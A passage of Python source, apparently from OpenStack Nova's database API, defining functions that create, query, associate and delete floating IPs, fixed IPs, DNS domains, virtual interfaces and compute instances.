count = 0
for ip in ips:
out.append(ip['address'])
count += 1
if count > block_size - 1:
yield out
out = []
count = 0
if out:
yield out
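def _example_ip_range_splitter():
    """Illustrative sketch only (editor's addition): with the default
    block_size of 256, 600 address dicts come back as blocks of 256, 256 and
    88 addresses.
    """
    ips = [{'address': '10.0.%d.%d' % (i // 256, i % 256)} for i in range(600)]
    return [len(block) for block in _ip_range_splitter(ips)]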
@require_context
@main_context_manager.writer
def floating_ip_bulk_destroy(context, ips):
project_id_to_quota_count = collections.defaultdict(int)
for ip_block in _ip_range_splitter(ips):
# Find any floating IPs that were not auto_assigned and
# thus need quota released.
query = model_query(context, models.FloatingIp).\
filter(models.FloatingIp.address.in_(ip_block)).\
filter_by(auto_assigned=False)
for row in query.all():
# The count is negative since we release quota by
# reserving negative quota.
project_id_to_quota_count[row['project_id']] -= 1
# Delete the floating IPs.
model_query(context, models.FloatingIp).\
filter(models.FloatingIp.address.in_(ip_block)).\
soft_delete(synchronize_session='fetch')
# Delete the quotas, if needed.
# Quota update happens in a separate transaction, so previous must have
# been committed first.
for project_id, count in project_id_to_quota_count.items():
try:
reservations = quota.QUOTAS.reserve(context,
project_id=project_id,
floating_ips=count)
quota.QUOTAS.commit(context, reservations, project_id=project_id)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE("Failed to update usages bulk "
"deallocating floating IP"))
@require_context
@main_context_manager.writer
def floating_ip_create(context, values):
floating_ip_ref = models.FloatingIp()
floating_ip_ref.update(values)
try:
floating_ip_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.FloatingIpExists(address=values['address'])
return floating_ip_ref
def _floating_ip_count_by_project(context, project_id):
nova.context.authorize_project_context(context, project_id)
# TODO(tr3buchet): why leave auto_assigned floating IPs out?
return model_query(context, models.FloatingIp, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(auto_assigned=False).\
count()
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@main_context_manager.writer
def floating_ip_fixed_ip_associate(context, floating_address,
fixed_address, host):
fixed_ip_ref = model_query(context, models.FixedIp).\
filter_by(address=fixed_address).\
options(joinedload('network')).\
first()
if not fixed_ip_ref:
raise exception.FixedIpNotFoundForAddress(address=fixed_address)
rows = model_query(context, models.FloatingIp).\
filter_by(address=floating_address).\
filter(models.FloatingIp.project_id ==
context.project_id).\
filter(or_(models.FloatingIp.fixed_ip_id ==
fixed_ip_ref['id'],
models.FloatingIp.fixed_ip_id.is_(None))).\
update({'fixed_ip_id': fixed_ip_ref['id'], 'host': host})
if not rows:
raise exception.FloatingIpAssociateFailed(address=floating_address)
return fixed_ip_ref
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@main_context_manager.writer
def floating_ip_deallocate(context, address):
return model_query(context, models.FloatingIp).\
filter_by(address=address).\
        filter(and_(models.FloatingIp.project_id != null(),
                    models.FloatingIp.fixed_ip_id == null())).\
update({'project_id': None,
'host': None,
'auto_assigned': False},
synchronize_session=False)
@require_context
@main_context_manager.writer
def floating_ip_destroy(context, address):
model_query(context, models.FloatingIp).\
filter_by(address=address).\
delete()
@require_context
@main_context_manager.writer
def floating_ip_disassociate(context, address):
floating_ip_ref = model_query(context,
models.FloatingIp).\
filter_by(address=address).\
first()
if not floating_ip_ref:
raise exception.FloatingIpNotFoundForAddress(address=address)
fixed_ip_ref = model_query(context, models.FixedIp).\
filter_by(id=floating_ip_ref['fixed_ip_id']).\
options(joinedload('network')).\
first()
floating_ip_ref.fixed_ip_id = None
floating_ip_ref.host = None
return fixed_ip_ref
def _floating_ip_get_all(context):
return model_query(context, models.FloatingIp, read_deleted="no")
@main_context_manager.reader
def floating_ip_get_all(context):
floating_ip_refs = _floating_ip_get_all(context).\
options(joinedload('fixed_ip')).\
all()
if not floating_ip_refs:
raise exception.NoFloatingIpsDefined()
return floating_ip_refs
@main_context_manager.reader
def floating_ip_get_all_by_host(context, host):
floating_ip_refs = _floating_ip_get_all(context).\
filter_by(host=host).\
options(joinedload('fixed_ip')).\
all()
if not floating_ip_refs:
raise exception.FloatingIpNotFoundForHost(host=host)
return floating_ip_refs
@require_context
@main_context_manager.reader
def floating_ip_get_all_by_project(context, project_id):
nova.context.authorize_project_context(context, project_id)
# TODO(tr3buchet): why do we not want auto_assigned floating IPs here?
return _floating_ip_get_all(context).\
filter_by(project_id=project_id).\
filter_by(auto_assigned=False).\
options(joinedload_all('fixed_ip.instance')).\
all()
@require_context
@main_context_manager.reader
def floating_ip_get_by_address(context, address):
return _floating_ip_get_by_address(context, address)
def _floating_ip_get_by_address(context, address):
# if address string is empty explicitly set it to None
if not address:
address = None
try:
result = model_query(context, models.FloatingIp).\
filter_by(address=address).\
options(joinedload_all('fixed_ip.instance')).\
first()
if not result:
raise exception.FloatingIpNotFoundForAddress(address=address)
except db_exc.DBError:
msg = _("Invalid floating IP %s in request") % address
LOG.warning(msg)
raise exception.InvalidIpAddressError(msg)
# If the floating IP has a project ID set, check to make sure
# the non-admin user has access.
if result.project_id and nova.context.is_user_context(context):
nova.context.authorize_project_context(context, result.project_id)
return result
@require_context
@main_context_manager.reader
def floating_ip_get_by_fixed_address(context, fixed_address):
return model_query(context, models.FloatingIp).\
outerjoin(models.FixedIp,
models.FixedIp.id ==
models.FloatingIp.fixed_ip_id).\
filter(models.FixedIp.address == fixed_address).\
all()
@require_context
@main_context_manager.reader
def floating_ip_get_by_fixed_ip_id(context, fixed_ip_id):
return model_query(context, models.FloatingIp).\
filter_by(fixed_ip_id=fixed_ip_id).\
all()
@require_context
@main_context_manager.writer
def floating_ip_update(context, address, values):
float_ip_ref = _floating_ip_get_by_address(context, address)
float_ip_ref.update(values)
try:
float_ip_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.FloatingIpExists(address=values['address'])
return float_ip_ref
###################
@require_context
@main_context_manager.reader
def dnsdomain_get(context, fqdomain):
return model_query(context, models.DNSDomain, read_deleted="no").\
filter_by(domain=fqdomain).\
with_lockmode('update').\
first()
def _dnsdomain_get_or_create(context, fqdomain):
domain_ref = dnsdomain_get(context, fqdomain)
if not domain_ref:
dns_ref = models.DNSDomain()
dns_ref.update({'domain': fqdomain,
'availability_zone': None,
'project_id': None})
return dns_ref
return domain_ref
@main_context_manager.writer
def dnsdomain_register_for_zone(context, fqdomain, zone):
domain_ref = _dnsdomain_get_or_create(context, fqdomain)
domain_ref.scope = 'private'
domain_ref.availability_zone = zone
context.session.add(domain_ref)
@main_context_manager.writer
def dnsdomain_register_for_project(context, fqdomain, project):
domain_ref = _dnsdomain_get_or_create(context, fqdomain)
domain_ref.scope = 'public'
domain_ref.project_id = project
context.session.add(domain_ref)
@main_context_manager.writer
def dnsdomain_unregister(context, fqdomain):
model_query(context, models.DNSDomain).\
filter_by(domain=fqdomain).\
delete()
@main_context_manager.reader
def dnsdomain_get_all(context):
return model_query(context, models.DNSDomain, read_deleted="no").all()
###################
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True,
retry_on_request=True)
@main_context_manager.writer
def fixed_ip_associate(context, address, instance_uuid, network_id=None,
reserved=False, virtual_interface_id=None):
"""Keyword arguments:
    reserved -- should be a boolean value (True or False); the exact value is
    used to filter on the fixed IP address
"""
if not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(uuid=instance_uuid)
network_or_none = or_(models.FixedIp.network_id == network_id,
models.FixedIp.network_id == null())
fixed_ip_ref = model_query(context, models.FixedIp, read_deleted="no").\
filter(network_or_none).\
filter_by(reserved=reserved).\
filter_by(address=address).\
first()
if fixed_ip_ref is None:
raise exception.FixedIpNotFoundForNetwork(address=address,
network_uuid=network_id)
if fixed_ip_ref.instance_uuid:
raise exception.FixedIpAlreadyInUse(address=address,
instance_uuid=instance_uuid)
params = {'instance_uuid': instance_uuid,
'allocated': virtual_interface_id is not None}
if not fixed_ip_ref.network_id:
params['network_id'] = network_id
if virtual_interface_id:
params['virtual_interface_id'] = virtual_interface_id
rows_updated = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(id=fixed_ip_ref.id).\
filter(network_or_none).\
filter_by(reserved=reserved).\
filter_by(address=address).\
update(params, synchronize_session='evaluate')
if not rows_updated:
LOG.debug('The row was updated in a concurrent transaction, '
'we will fetch another row')
raise db_exc.RetryRequest(
exception.FixedIpAssociateFailed(net=network_id))
return fixed_ip_ref
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True,
retry_on_request=True)
@main_context_manager.writer
def fixed_ip_associate_pool(context, network_id, instance_uuid=None,
host=None, virtual_interface_id=None):
"""allocate a fixed ip out of a fixed ip network pool.
This allocates an unallocated fixed ip out of a specified
network. We sort by updated_at to hand out the oldest address in
the list.
"""
if instance_uuid and not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(uuid=instance_uuid)
network_or_none = or_(models.FixedIp.network_id == network_id,
models.FixedIp.network_id == null())
fixed_ip_ref = model_query(context, models.FixedIp, read_deleted="no").\
filter(network_or_none).\
filter_by(reserved=False).\
filter_by(instance_uuid=None).\
filter_by(host=None).\
filter_by(leased=False).\
order_by(asc(models.FixedIp.updated_at)).\
first()
if not fixed_ip_ref:
raise exception.NoMoreFixedIps(net=network_id)
params = {'allocated': virtual_interface_id is not None}
if fixed_ip_ref['network_id'] is None:
params['network_id'] = network_id
if instance_uuid:
params['instance_uuid'] = instance_uuid
if host:
params['host'] = host
if virtual_interface_id:
params['virtual_interface_id'] = virtual_interface_id
rows_updated = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(id=fixed_ip_ref['id']).\
filter_by(network_id=fixed_ip_ref['network_id']).\
filter_by(reserved=False).\
filter_by(instance_uuid=None).\
filter_by(host=None).\
filter_by(leased=False).\
filter_by(address=fixed_ip_ref['address']).\
update(params, synchronize_session='evaluate')
if not rows_updated:
LOG.debug('The row was updated in a concurrent transaction, '
'we will fetch another row')
raise db_exc.RetryRequest(
exception.FixedIpAssociateFailed(net=network_id))
return fixed_ip_ref
@require_context
@main_context_manager.writer
def fixed_ip_create(context, values):
fixed_ip_ref = models.FixedIp()
fixed_ip_ref.update(values)
try:
fixed_ip_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.FixedIpExists(address=values['address'])
return fixed_ip_ref
@require_context
@main_context_manager.writer
def fixed_ip_bulk_create(context, ips):
try:
tab = models.FixedIp.__table__
context.session.execute(tab.insert(), ips)
except db_exc.DBDuplicateEntry as e:
raise exception.FixedIpExists(address=e.value)
@require_context
@main_context_manager.writer
def fixed_ip_disassociate(context, address):
_fixed_ip_get_by_address(context, address).update(
{'instance_uuid': None,
'virtual_interface_id': None})
@main_context_manager.writer
def fixed_ip_disassociate_all_by_timeout(context, host, time):
# NOTE(vish): only update fixed ips that "belong" to this
# host; i.e. the network host or the instance
# host matches. Two queries necessary because
# join with update doesn't work.
host_filter = or_(and_(models.Instance.host == host,
models.Network.multi_host == true()),
models.Network.host == host)
result = model_query(context, models.FixedIp, (models.FixedIp.id,),
read_deleted="no").\
filter(models.FixedIp.allocated == false()).\
filter(models.FixedIp.updated_at < time).\
join((models.Network,
models.Network.id == models.FixedIp.network_id)).\
join((models.Instance,
models.Instance.uuid == models.FixedIp.instance_uuid)).\
filter(host_filter).\
all()
fixed_ip_ids = [fip[0] for fip in result]
if not fixed_ip_ids:
return 0
result = model_query(context, models.FixedIp).\
filter(models.FixedIp.id.in_(fixed_ip_ids)).\
update({'instance_uuid': None,
'leased': False,
'updated_at': timeutils.utcnow()},
synchronize_session='fetch')
return result
@require_context
@main_context_manager.reader
def fixed_ip_get(context, id, get_network=False):
query = model_query(context, models.FixedIp).filter_by(id=id)
if get_network:
query = query.options(joinedload('network'))
result = query.first()
if not result:
raise exception.FixedIpNotFound(id=id)
# FIXME(sirp): shouldn't we just use project_only here to restrict the
# results?
if (nova.context.is_user_context(context) and
result['instance_uuid'] is not None):
instance = instance_get_by_uuid(context.elevated(read_deleted='yes'),
result['instance_uuid'])
nova.context.authorize_project_context(context, instance.project_id)
return result
@main_context_manager.reader
def fixed_ip_get_all(context):
result = model_query(context, models.FixedIp, read_deleted="yes").all()
if not result:
raise exception.NoFixedIpsDefined()
return result
@require_context
@main_context_manager.reader
def fixed_ip_get_by_address(context, address, columns_to_join=None):
return _fixed_ip_get_by_address(context, address,
columns_to_join=columns_to_join)
def _fixed_ip_get_by_address(context, address, columns_to_join=None):
if columns_to_join is None:
columns_to_join = []
try:
result = model_query(context, models.FixedIp)
for column in columns_to_join:
result = result.options(joinedload_all(column))
result = result.filter_by(address=address).first()
if not result:
raise exception.FixedIpNotFoundForAddress(address=address)
except db_exc.DBError:
msg = _("Invalid fixed IP Address %s in request") % address
LOG.warning(msg)
raise exception.FixedIpInvalid(msg)
# NOTE(sirp): shouldn't we just use project_only here to restrict the
# results?
if (nova.context.is_user_context(context) and
result['instance_uuid'] is not None):
instance = _instance_get_by_uuid(
context.elevated(read_deleted='yes'),
result['instance_uuid'])
nova.context.authorize_project_context(context,
instance.project_id)
return result
@require_context
@main_context_manager.reader
def fixed_ip_get_by_floating_address(context, floating_address):
return model_query(context, models.FixedIp).\
join(models.FloatingIp,
models.FloatingIp.fixed_ip_id ==
models.FixedIp.id).\
filter(models.FloatingIp.address == floating_address).\
first()
# NOTE(tr3buchet) please don't invent an exception here, None is fine
@require_context
@main_context_manager.reader
def fixed_ip_get_by_instance(context, instance_uuid):
if not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(uuid=instance_uuid)
vif_and = and_(models.VirtualInterface.id ==
models.FixedIp.virtual_interface_id,
models.VirtualInterface.deleted == 0)
result = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(instance_uuid=instance_uuid).\
outerjoin(models.VirtualInterface, vif_and).\
options(contains_eager("virtual_interface")).\
options(joinedload('network')).\
options(joinedload('floating_ips')).\
order_by(asc(models.VirtualInterface.created_at),
asc(models.VirtualInterface.id)).\
all()
if not result:
raise exception.FixedIpNotFoundForInstance(instance_uuid=instance_uuid)
return result
@main_context_manager.reader
def fixed_ip_get_by_host(context, host):
instance_uuids = _instance_get_all_uuids_by_host(context, host)
if not instance_uuids:
return []
return model_query(context, models.FixedIp).\
filter(models.FixedIp.instance_uuid.in_(instance_uuids)).\
all()
@require_context
@main_context_manager.reader
def fixed_ip_get_by_network_host(context, network_id, host):
result = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(network_id=network_id).\
filter_by(host=host).\
first()
if not result:
raise exception.FixedIpNotFoundForNetworkHost(network_id=network_id,
host=host)
return result
@require_context
@main_context_manager.reader
def fixed_ips_by_virtual_interface(context, vif_id):
result = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(virtual_interface_id=vif_id).\
options(joinedload('network')).\
options(joinedload('floating_ips')).\
all()
return result
@require_context
@main_context_manager.writer
def fixed_ip_update(context, address, values):
_fixed_ip_get_by_address(context, address).update(values)
def _fixed_ip_count_by_project(context, project_id):
nova.context.authorize_project_context(context, project_id)
return model_query(context, models.FixedIp, (models.FixedIp.id,),
read_deleted="no").\
join((models.Instance,
models.Instance.uuid == models.FixedIp.instance_uuid)).\
filter(models.Instance.project_id == project_id).\
count()
###################
@require_context
@pick_context_manager_writer
def virtual_interface_create(context, values):
"""Create a new virtual interface record in the database.
    :param values: dict containing column values
"""
try:
vif_ref = models.VirtualInterface()
vif_ref.update(values)
vif_ref.save(context.session)
except db_exc.DBError:
raise exception.VirtualInterfaceCreateException()
return vif_ref
def _virtual_interface_query(context):
return model_query(context, models.VirtualInterface, read_deleted="no")
@require_context
@pick_context_manager_reader
def virtual_interface_get(context, vif_id):
"""Gets a virtual interface from the table.
    :param vif_id: id of the virtual interface
"""
vif_ref = _virtual_interface_query(context).\
filter_by(id=vif_id).\
first()
return vif_ref
@require_context
@pick_context_manager_reader
def virtual_interface_get_by_address(context, address):
"""Gets a virtual interface from the table.
    :param address: the address of the interface you're looking to get
"""
try:
vif_ref = _virtual_interface_query(context).\
filter_by(address=address).\
first()
except db_exc.DBError:
msg = _("Invalid virtual interface address %s in request") % address
LOG.warning(msg)
raise exception.InvalidIpAddressError(msg)
return vif_ref
@require_context
@pick_context_manager_reader
def virtual_interface_get_by_uuid(context, vif_uuid):
"""Gets a virtual interface from the table.
:param vif_uuid: the uuid of the interface you're looking to get
"""
vif_ref = _virtual_interface_query(context).\
filter_by(uuid=vif_uuid).\
first()
return vif_ref
@require_context
@require_instance_exists_using_uuid
@pick_context_manager_reader_allow_async
def virtual_interface_get_by_instance(context, instance_uuid):
"""Gets all virtual interfaces for instance.
    :param instance_uuid: uuid of the instance to retrieve vifs for
"""
vif_refs = _virtual_interface_query(context).\
filter_by(instance_uuid=instance_uuid).\
order_by(asc("created_at"), asc("id")).\
all()
return vif_refs
@require_context
@pick_context_manager_reader
def virtual_interface_get_by_instance_and_network(context, instance_uuid,
network_id):
"""Gets virtual interface for instance that's associated with network."""
vif_ref = _virtual_interface_query(context).\
filter_by(instance_uuid=instance_uuid).\
filter_by(network_id=network_id).\
first()
return vif_ref
@require_context
@pick_context_manager_writer
def virtual_interface_delete_by_instance(context, instance_uuid):
"""Delete virtual interface records that are associated
    with the instance given by instance_uuid.
    :param instance_uuid: uuid of instance
"""
_virtual_interface_query(context).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
@require_context
@pick_context_manager_reader
def virtual_interface_get_all(context):
"""Get all vifs."""
vif_refs = _virtual_interface_query(context).all()
return vif_refs
###################
def _metadata_refs(metadata_dict, meta_class):
metadata_refs = []
if metadata_dict:
for k, v in metadata_dict.items():
metadata_ref = meta_class()
metadata_ref['key'] = k
metadata_ref['value'] = v
metadata_refs.append(metadata_ref)
return metadata_refs
def _validate_unique_server_name(context, name):
if not CONF.osapi_compute_unique_server_name_scope:
return
lowername = name.lower()
base_query = model_query(context, models.Instance, read_deleted='no').\
filter(func.lower(models.Instance.hostname) == lowername)
if CONF.osapi_compute_unique_server_name_scope == 'project':
instance_with_same_name = base_query.\
filter_by(project_id=context.project_id).\
count()
elif CONF.osapi_compute_unique_server_name_scope == 'global':
instance_with_same_name = base_query.count()
else:
msg = _('Unknown osapi_compute_unique_server_name_scope value: %s'
' Flag must be empty, "global" or'
' "project"') % CONF.osapi_compute_unique_server_name_scope
LOG.warning(msg)
return
if instance_with_same_name > 0:
raise exception.InstanceExists(name=lowername)
def _handle_objects_related_type_conversions(values):
"""Make sure that certain things in values (which may have come from
an objects.instance.Instance object) are in suitable form for the
database.
"""
# NOTE(danms): Make sure IP addresses are passed as strings to
# the database engine
for key in ('access_ip_v4', 'access_ip_v6'):
if key in values and values[key] is not None:
values[key] = str(values[key])
datetime_keys = ('created_at', 'deleted_at', 'updated_at',
'launched_at', 'terminated_at')
convert_objects_related_datetimes(values, *datetime_keys)
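# Illustrative sketch (editorial addition, not part of the original module):
# what the conversion helper above does to a values dict before it is handed
# to SQLAlchemy.  The netaddr import and the address are assumptions made for
# the example only.
def _example_type_conversions():
    import netaddr
    values = {'access_ip_v4': netaddr.IPAddress('10.0.0.5')}
    _handle_objects_related_type_conversions(values)
    # values['access_ip_v4'] is now the plain string '10.0.0.5'
    return values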
def _check_instance_exists_in_project(context, instance_uuid):
if not model_query(context, models.Instance, read_deleted="no",
project_only=True).filter_by(
uuid=instance_uuid).first():
raise exception.InstanceNotFound(instance_id=instance_uuid)
@require_context
@pick_context_manager_writer
def instance_create(context, values):
"""Create a new Instance record in the database.
context - request context object
values - dict containing column values.
"""
security_group_ensure_default(context)
values = values.copy()
values['metadata'] = _metadata_refs(
values.get('metadata'), models.InstanceMetadata)
values['system_metadata'] = _metadata_refs(
values.get('system_metadata'), models.InstanceSystemMetadata)
_handle_objects_related_type_conversions(values)
instance_ref = models.Instance()
if not values.get('uuid'):
values['uuid'] = str(uuid.uuid4())
instance_ref['info_cache'] = models.InstanceInfoCache()
info_cache = values.pop('info_cache', None)
if info_cache is not None:
instance_ref['info_cache'].update(info_cache)
security_groups = values.pop('security_groups', [])
instance_ref['extra'] = models.InstanceExtra()
instance_ref['extra'].update(
{'numa_topology': None,
'pci_requests': None,
'vcpu_model': None,
})
instance_ref['extra'].update(values.pop('extra', {}))
instance_ref.update(values)
def _get_sec_group_models(security_groups):
models = []
default_group = _security_group_ensure_default(context)
if 'default' in security_groups:
models.append(default_group)
# Generate a new list, so we don't modify the original
security_groups = [x for x in security_groups if x != 'default']
if security_groups:
models.extend(_security_group_get_by_names(context,
context.project_id, security_groups))
return models
if 'hostname' in values:
_validate_unique_server_name(context, values['hostname'])
instance_ref.security_groups = _get_sec_group_models(security_groups)
context.session.add(instance_ref)
# create the instance uuid to ec2_id mapping entry for instance
ec2_instance_create(context, instance_ref['uuid'])
return instance_ref
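# Illustrative sketch (editorial addition, not part of the original module):
# a minimal instance_create call.  Only a handful of columns are shown and
# the values are made up; real callers pass considerably more.
def _example_create_instance(context):
    values = {
        'project_id': context.project_id,
        'user_id': context.user_id,
        'hostname': 'demo-instance',
        'metadata': {'purpose': 'demo'},
        'security_groups': ['default'],
    }
    return instance_create(context, values)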
def _instance_data_get_for_user(context, project_id, user_id):
result = model_query(context, models.Instance, (
func.count(models.Instance.id),
func.sum(models.Instance.vcpus),
func.sum(models.Instance.memory_mb))).\
filter_by(project_id=project_id)
if user_id:
result = result.filter_by(user_id=user_id).first()
else:
result = result.first()
# NOTE(vish): convert None to 0
return (result[0] or 0, result[1] or 0, result[2] or 0)
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@pick_context_manager_writer
def instance_destroy(context, instance_uuid, constraint=None):
if uuidutils.is_uuid_like(instance_uuid):
instance_ref = _instance_get_by_uuid(context, instance_uuid)
else:
raise exception.InvalidUUID(instance_uuid)
query = model_query(context, models.Instance).\
filter_by(uuid=instance_uuid)
if constraint is not None:
query = constraint.apply(models.Instance, query)
count = query.soft_delete()
if count == 0:
raise exception.ConstraintNotMet()
model_query(context, models.SecurityGroupInstanceAssociation).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
model_query(context, models.InstanceInfoCache).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
model_query(context, models.InstanceMetadata).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
model_query(context, models.InstanceFault).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
model_query(context, models.InstanceExtra).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
model_query(context, models.InstanceSystemMetadata).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
# NOTE(snikitin): We can't use model_query here, because there is no
# column 'deleted' in the 'tags' table.
context.session.query(models.Tag).filter_by(
resource_id=instance_uuid).delete()
return instance_ref
@require_context
@pick_context_manager_reader_allow_async
def instance_get_by_uuid(context, uuid, columns_to_join=None):
return _instance_get_by_uuid(context, uuid,
columns_to_join=columns_to_join)
def _instance_get_by_uuid(context, uuid, columns_to_join=None):
result = _build_instance_get(context, columns_to_join=columns_to_join).\
filter_by(uuid=uuid).\
first()
if not result:
raise exception.InstanceNotFound(instance_id=uuid)
return result
@require_context
@pick_context_manager_reader
def instance_get(context, instance_id, columns_to_join=None):
try:
result = _build_instance_get(context, columns_to_join=columns_to_join
).filter_by(id=instance_id).first()
if not result:
raise exception.InstanceNotFound(instance_id=instance_id)
return result
except db_exc.DBError:
# NOTE(sdague): catch all in case the db engine chokes on the
# id because it's too long of an int to store.
msg = _("Invalid instance id %s in request") % instance_id
LOG.warning(msg)
raise exception.InvalidID(id=instance_id)
def _build_instance_get(context, columns_to_join=None):
query = model_query(context, models.Instance, project_only=True).\
options(joinedload_all('security_groups.rules')).\
options(joinedload('info_cache'))
if columns_to_join is None:
columns_to_join = ['metadata', 'system_metadata']
for column in columns_to_join:
if column in ['info_cache', 'security_groups']:
# Already always joined above
continue
if 'extra.' in column:
query = query.options(undefer(column))
else:
query = query.options(joinedload(column))
# NOTE(alaski) Stop lazy loading of columns not needed.
for col in ['metadata', 'system_metadata']:
if col not in columns_to_join:
query = query.options(noload(col))
return query
def _instances_fill_metadata(context, instances, manual_joins=None):
"""Selectively fill instances with manually-joined metadata. Note that
each instance will be converted to a dict.
:param context: security context
:param instances: list of instances to fill
:param manual_joins: list of tables to manually join (can be any
combination of 'metadata' and 'system_metadata' or
None to take the default of both)
"""
uuids = [inst['uuid'] for inst in instances]
if manual_joins is None:
manual_joins = ['metadata', 'system_metadata']
meta = collections.defaultdict(list)
if 'metadata' in manual_joins:
for row in _instance_metadata_get_multi(context, uuids):
meta[row['instance_uuid']].append(row)
sys_meta = collections.defaultdict(list)
if 'system_metadata' in manual_joins:
for row in _instance_system_metadata_get_multi(context, uuids):
sys_meta[row['instance_uuid']].append(row)
pcidevs = collections.defaultdict(list)
if 'pci_devices' in manual_joins:
for row in _instance_pcidevs_get_multi(context, uuids):
pcidevs[row['instance_uuid']].append(row)
filled_instances = []
for inst in instances:
inst = dict(inst)
inst['system_metadata'] = sys_meta[inst['uuid']]
inst['metadata'] = meta[inst['uuid']]
if 'pci_devices' in manual_joins:
inst['pci_devices'] = pcidevs[inst['uuid']]
filled_instances.append(inst)
return filled_instances
def _manual_join_columns(columns_to_join):
"""Separate manually joined columns from columns_to_join
If columns_to_join contains 'metadata', 'system_metadata', or
'pci_devices' those columns are removed from columns_to_join and added
to a manual_joins list to be used with the _instances_fill_metadata method.
The columns_to_join formal parameter is copied and not modified; the return
tuple has the modified columns_to_join list to be used with joinedload in
a model query.
:param columns_to_join: List of columns to join in a model query.
:return: tuple of (manual_joins, columns_to_join)
"""
manual_joins = []
columns_to_join_new = copy.copy(columns_to_join)
for column in ('metadata', 'system_metadata', 'pci_devices'):
if column in columns_to_join_new:
columns_to_join_new.remove(column)
manual_joins.append(column)
return manual_joins, columns_to_join_new
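# Illustrative sketch (editorial addition, not part of the original module):
# how the columns are split between manual joins and SQL joins.
def _example_manual_join_columns():
    manual, joined = _manual_join_columns(
        ['metadata', 'info_cache', 'pci_devices'])
    # manual == ['metadata', 'pci_devices'] -> filled in by
    # _instances_fill_metadata; joined == ['info_cache'] -> joinedload'd.
    return manual, joined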
@require_context
@pick_context_manager_reader
def instance_get_all(context, columns_to_join=None):
if columns_to_join is None:
columns_to_join_new = ['info_cache', 'security_groups']
manual_joins = ['metadata', 'system_metadata']
else:
manual_joins, columns_to_join_new = (
_manual_join_columns(columns_to_join))
query = model_query(context, models.Instance)
for column in columns_to_join_new:
query = query.options(joinedload(column))
if not context.is_admin:
# If we're not admin context, add appropriate filter.
if context.project_id:
query = query.filter_by(project_id=context.project_id)
else:
query = query.filter_by(user_id=context.user_id)
instances = query.all()
return _instances_fill_metadata(context, instances, manual_joins)
@require_context
@pick_context_manager_reader_allow_async
def instance_get_all_by_filters(context, filters, sort_key, sort_dir,
limit=None, marker=None, columns_to_join=None):
"""Return instances matching all filters sorted by the primary key.
See instance_get_all_by_filters_sort for more information.
"""
# Invoke the API with the multiple sort keys and directions using the
# single sort key/direction
return instance_get_all_by_filters_sort(context, filters, limit=limit,
marker=marker,
columns_to_join=columns_to_join,
sort_keys=[sort_key],
sort_dirs=[sort_dir])
@require_context
@pick_context_manager_reader_allow_async
def instance_get_all_by_filters_sort(context, filters, limit=None, marker=None,
columns_to_join=None, sort_keys=None,
sort_dirs=None):
"""Return instances that match all filters sorted by the given keys.
Deleted instances will be returned by default, unless there's a filter that
says otherwise.
Depending on the name of a filter, matching for that filter is
performed using either exact matching or as regular expression
matching. Exact matching is applied for the following filters::
| ['project_id', 'user_id', 'image_ref',
| 'vm_state', 'instance_type_id', 'uuid',
| 'metadata', 'host', 'system_metadata']
A third type of filter (also using exact matching), filters
based on instance metadata tags when supplied under a special
key named 'filter'::
| filters = {
| 'filter': [
| {'name': 'tag-key', 'value': '<metakey>'},
| {'name': 'tag-value', 'value': '<metaval>'},
| {'name': 'tag:<metakey>', 'value': '<metaval>'}
| ]
| }
Special keys are used to tweak the query further::
| 'changes-since' - only return instances updated after
| 'deleted' - only return (or exclude) deleted instances
| 'soft_deleted' - modify behavior of 'deleted' to either
| include or exclude instances whose
| vm_state is SOFT_DELETED.
A fourth type of filter (also using exact matching), filters
based on instance tags (not metadata tags). There are two types
of these tags:
`tags` -- One or more strings that will be used to filter results
in an AND expression.
`tags-any` -- One or more strings that will be used to filter results in
an OR expression.
Tags should be represented as list::
| filters = {
| 'tags': [some-tag, some-another-tag],
| 'tags-any': [some-any-tag, some-another-any-tag]
| }
"""
# NOTE(mriedem): If the limit is 0 there is no point in even going
# to the database since nothing is going to be returned anyway.
if limit == 0:
return []
sort_keys, sort_dirs = process_sort_params(sort_keys,
sort_dirs,
default_dir='desc')
if columns_to_join is None:
columns_to_join_new = ['info_cache', 'security_groups']
manual_joins = ['metadata', 'system_metadata']
else:
manual_joins, columns_to_join_new = (
_manual_join_columns(columns_to_join))
query_prefix = context.session.query(models.Instance)
for column in columns_to_join_new:
if 'extra.' in column:
query_prefix = query_prefix.options(undefer(column))
else:
query_prefix = query_prefix.options(joinedload(column))
# Note: order_by is done in the sqlalchemy.utils.py paginate_query(),
# no need to do it here as well
# Make a copy of the filters dictionary to use going forward, as we'll
# be modifying it and we shouldn't affect the caller's use of it.
filters = filters.copy()
if 'changes-since' in filters:
changes_since = timeutils.normalize_time(filters['changes-since'])
query_prefix = query_prefix.\
filter(models.Instance.updated_at >= changes_since)
if 'deleted' in filters:
# Instances can be soft or hard deleted and the query needs to
# include or exclude both
deleted = filters.pop('deleted')
if deleted:
if filters.pop('soft_deleted', True):
delete = or_(
models.Instance.deleted == models.Instance.id,
models.Instance.vm_state == vm_states.SOFT_DELETED
)
query_prefix = query_prefix.\
filter(delete)
else:
query_prefix = query_prefix.\
filter(models.Instance.deleted == models.Instance.id)
else:
query_prefix = query_prefix.\
